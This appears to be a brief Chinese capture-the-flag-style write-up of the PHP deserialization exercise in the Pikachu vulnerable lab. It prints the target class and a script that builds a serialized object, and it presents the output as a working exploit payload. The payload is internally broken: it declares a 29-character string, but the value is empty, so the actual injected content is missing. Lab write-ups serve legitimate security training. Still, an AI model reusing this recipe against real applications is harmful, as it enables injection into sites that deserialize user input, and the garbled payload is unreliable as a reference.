Pikachu漏洞靶场 PHP反序列化

PHP反序列化

查看源码,以下为关键代码:

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}

首先是一个PHP类,里面有一个变量test;还有构造函数__construct(),它输出本实例的test变量值。

当使用 new 关键字实例化一个对象时,构造函数将会自动调用。

构造payload


class S{
    var $test = "";
}
$c = new S();
echo(serialize($c));
?>

运行:

Pikachu漏洞靶场 PHP反序列化_第1张图片

得到payload:

O:1:"S":1:{s:4:"test";s:29:"";}

在网站提交准备好的payload,反序列化成功利用:

Pikachu漏洞靶场 PHP反序列化_第2张图片

你可能感兴趣的:(pikachu笔记,web安全,安全,漏洞靶场,php,反序列化漏洞)